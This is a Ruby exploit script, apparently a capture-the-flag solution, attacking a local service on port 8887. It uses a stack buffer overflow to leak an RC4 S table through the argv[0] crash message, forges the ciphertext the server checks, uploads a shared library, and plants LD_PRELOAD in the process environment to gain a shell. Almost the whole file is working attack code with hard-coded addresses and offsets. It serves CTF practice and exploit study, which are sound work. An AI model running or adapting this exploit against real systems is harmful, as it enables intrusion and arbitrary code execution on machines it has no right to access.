- # coding: ascii-8bit
- require 'ctf.rb'
- require 'hexdump'
# Keywords
# ・StackBOF => argv[0] leak
# ・Shared Library Injection
# ・RC4
# Endpoint every Cpwn.open call in this script connects to.
Host, Port = "localhost", 8887
# Reads the RC4 S table out of the remote process through the argv[0] leak.
#
# @param offset [Integer] bytes added to the leak address so that a second call
#   can continue after a "\x00" that cut the first leak short
# @return [String] the bytes received between "detected ***: " and " terminated"
def get_stable(offset = 0)
  puts "[+] RC4 S table leak by argv[0] leak".colorize(:red)
  Cpwn.open(Host, Port) do |c|
    payload = "\x00" * 0x118 # all zeros: per the author, strlen returns 0 so the input is not encrypted
    payload << p64(0x602160 + offset) # leak from the address advanced by offset to pick up what follows a "\x00"
    payload << "\n"
    c.send(payload)
    c.recv_until("detected ***: ")
    # `return` inside the block exits get_stable itself, not only the block.
    return c.recv_until(" terminated").gsub(" terminated", "")
  end
end
# Straight transcription of the RC4 pseudo-random generation algorithm (PRGA).
#
# @param size [Integer] number of keystream bytes to produce (non-positive yields "")
# @param stable_origin [Array<Integer>] the 256-entry S table after key scheduling; not modified
# @return [String] `size` keystream bytes
def rc4_prga(size, stable_origin)
  # Deep-copy the table so the caller can reuse the same S table for several messages.
  # This Marshal round-trip only touches a local array, never external data.
  s = Marshal.load(Marshal.dump(stable_origin))
  i = j = 0
  size.times.each_with_object(String.new) do |_, keystream|
    i = (i + 1) % 256
    j = (j + s[i]) % 256
    s[i], s[j] = s[j], s[i]
    keystream << s[(s[i] + s[j]) % 256].chr
  end
end
# XORs `s1` with an RC4 keystream derived from `stable` (encryption and decryption are the same operation).
#
# @param s1 [String] input bytes; indexed per character, so binary-encoded strings are expected
# @param stable [Array<Integer>] the 256-entry S table after key scheduling
# @return [String] `s1` XORed byte-for-byte with the keystream
def rc4(s1, stable)
  keystream = rc4_prga(s1.length, stable)
  s1.each_char.with_index.each_with_object(String.new) do |(ch, idx), out|
    out << (ch.ord ^ keystream[idx].ord).chr
  end
end
# The argv[0] leak stops at the first "\x00", so a "\x00" is appended and the
# leak is repeated from the address advanced by the bytes recovered so far.
stable = get_stable(0).concat("\x00")
stable.concat(get_stable(stable.length))
Hexdump.dump(stable)
stable = stable.each_char.map(&:ord)
# Ciphertext the server compares against (see the strcmp notes below).
Cipher = p64(0xf39fbfbd85aa3162, 0xe4ab23ac750c028a, 0x61c9bdef7a25c582)
# Send the ciphertext the server's strcmp expects, then the shared library bytes.
Cpwn.open(Host, Port) do |c|
  # 0x400c5b <main+318>: call 0x400840 <strcmp@plt>
  # arg[0]: 0x602120 --> output
  # arg[1]: 0x400da6 --> 0xf39fbfbd85aa3162
  # 0x400da6: 0xf39fbfbd85aa3162 0xe4ab23ac750c028
  # 0x400db6: 0x61c9bdef7a25c582
  buf = rc4(Cipher, stable)
  c.send(buf + "\n")
  puts c.recv_until("message")
  # NOTE(review): File.binread("mylib.so") would avoid the shell and raise if the
  # file is missing, whereas `cat` silently sends an empty body.
  c.send(`cat mylib.so`) # upload shared library (starts a shell)
end
Cpwn.open(Host, Port) do |c|
  # c.debug = true
  # envp[0] : 0x128
  # Set LD_PRELOAD=./message in the running program.
  buf = rc4(Cipher+"\0\0"+"LD_PRELOAD=./message\0", stable) + "\0"
  buf << " " * (0x128 - buf.length) # pad up to 0x128, presumably the envp[0] offset noted above
  buf << p64(0x60213a, 0x0)
  buf << "\n"
  c.send(buf)
  puts c.recv_until("message")
  c.hacked
end